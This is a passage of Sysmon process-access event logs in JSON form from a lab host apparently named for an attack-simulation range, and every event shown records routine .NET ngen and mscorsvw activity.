C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.464","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010E4000E00}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.464\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010E4000E00}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.464","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010E4000E00}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.464\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010E4000E00}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.464","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010E4000E00}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6930,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001025040E00}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001025040E00}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6931,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001025040E00}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001025040E00}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6932,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001025040E00}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001025040E00}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6933,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.527\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010C8070E00}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.527","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010C8070E00}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6934,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.527\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010C8070E00}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.527","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010C8070E00}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
